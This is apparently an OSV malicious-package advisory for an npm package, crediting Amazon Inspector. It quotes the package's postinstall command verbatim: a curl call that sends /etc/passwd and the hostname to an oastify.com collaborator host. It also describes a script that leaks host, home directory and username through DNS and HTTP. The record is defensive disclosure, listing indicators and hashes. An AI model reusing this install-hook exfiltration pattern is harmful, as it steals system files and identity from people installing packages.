{"id":"MAL-2026-5409","summary":"Malicious code in @easy-entry/outside-registration-fop-navigator (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (04091b4e3c6018586c8ba0c6106ff9177090d0776d1a723d041a76d67b1c8f2b)\nOn `npm install`, package.json's postinstall hook executes `node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com`, sending the installer's /etc/passwd contents and hostname to a Burp Collaborator subdomain. In parallel, scripts/scream3gg.js hex-encodes os.hostname(), os.homedir(), and os.userInfo().username and issues a fetch to `http://\u003chex\u003e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com`, leaking installer host identity through DNS/HTTP to the attacker. Both behaviors fire automatically and unconditionally on default install.\n","modified":"2026-06-09T18:01:29.959795370Z","published":"2026-06-09T17:18:57Z","database_specific":{"malicious-packages-origins":[{"versions":["99.9.5"],"source":"amazon-inspector","sha256":"04091b4e3c6018586c8ba0c6106ff9177090d0776d1a723d041a76d67b1c8f2b","modified_time":"2026-06-09T17:18:57Z","id":"IN-MAL-2026-005025","import_time":"2026-06-09T17:45:49.740932319Z"},{"import_time":"2026-06-09T17:45:49.829197796Z","id":"IN-MAL-2026-005026","versions":["99.9.5"],"modified_time":"2026-06-09T17:18:57Z","sha256":"8f3fde652e3e14c71950b1c929e0be830c9e81c44378a2e625e6e9bfea8ab8f6","source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@easy-entry/outside-registration-fop-navigator/v/99.9.5"}],"affected":[{"package":{"name":"@easy-entry/outside-registration-fop-navigator","ecosystem":"npm","purl":"pkg:npm/%40easy-entry%2Foutside-registration-fop-navigator"},"versions":["99.9.5"],"database_specific":{"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"indicators":{"package_integrity":[{"filename":"outside-registration-fop-navigator-99.9.5.tgz","hashes":{"sha1":"03c230ca2b513d68fbb5627f10784458abb99967","sha512_sri":"sha512-vpCRGv5vvBsXb9RyJ6yP1yQkpuKKUjrVsWApSlfKIxcItE5vWytgrn4Vdpxv1LeqnDS1F+GAUO2wuCAcylAzDw=="}}],"evidence_files":[{"path":"package.json","tlsh":"9ed097a0bc20cb73b9de1677c428a2497d63cc9b17007e2202db87f09114371b9a6c0a","sha256":"7cfe7d61a3f378ab0a79ef3db901372b6167ab6621a6d9a8ee5c818b9a32915a"},{"tlsh":"74f08ba955b11938382b50819dafd40db1e7fa0630a6e4f2fedd86810f44865bd22dde","path":"scripts/scream3gg.js","sha256":"9b962b07165e35cb12a1424434b1d1be779ead9b43df94af8baf0e5a1b66a6c9"}],"domains":["2f686f6d652f7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com","7363616e2d636662643231313766346366.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com","7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com"]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@easy-entry/outside-registration-fop-navigator/MAL-2026-5409.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}